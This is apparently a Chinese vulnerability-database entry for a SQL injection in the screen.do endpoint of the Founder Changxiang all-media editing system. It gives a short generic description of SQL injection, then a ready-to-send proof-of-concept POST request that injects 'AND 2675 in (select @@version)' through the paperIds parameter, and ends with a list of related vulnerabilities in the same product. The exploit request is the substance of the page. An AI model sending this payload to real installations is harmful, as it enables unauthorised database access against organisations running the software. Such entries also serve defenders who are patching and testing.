方正畅享全媒体采编系统 screen.do SQL注入漏洞

日期: 2024-11-01 | 影响软件: 方正畅享全媒体采编系统 | POC: 已公开

漏洞描述

SQL注入漏洞是指攻击者通过在Web应用程序的输入字段中插入恶意SQL代码，从而绕过应用程序的安全措施，直接对数据库执行非法操作。这种漏洞通常发生在应用程序未对用户输入进行充分验证和过滤的情况下，使得攻击者能够获取、修改或删除数据库中的数据，甚至可能执行服务器上的任意代码。

PoC代码

POST /newsedit/newsplan/screen.do HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close
 
method=getPaperLayoutList&pageNo=1&pageSize=5&paperDate=2022-11-30&paperIds=123+AND+2675+in+(select+@@version)&terminalType=123

漏洞描述

PoC代码

相关漏洞推荐

founder-binary-do-sqli.yaml: 方正畅享全媒体采编系统 binary.do SQL注入 POC

方正畅享全媒体采编系统 /newsedit/newsedit/xy/imageProxy.do 文件读取漏洞 无POC

方正畅享全媒体采编系统 weixinMain.do XXE漏洞 无POC

founder-syn-do-inclosure: 方正畅享全媒体采编系统敏感信息泄露 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

方正畅享全媒体采编系统 /newsedit/newsedit/xy/imageProxy.do 文件读取漏洞无POC

方正畅享全媒体采编系统 weixinMain.do XXE漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC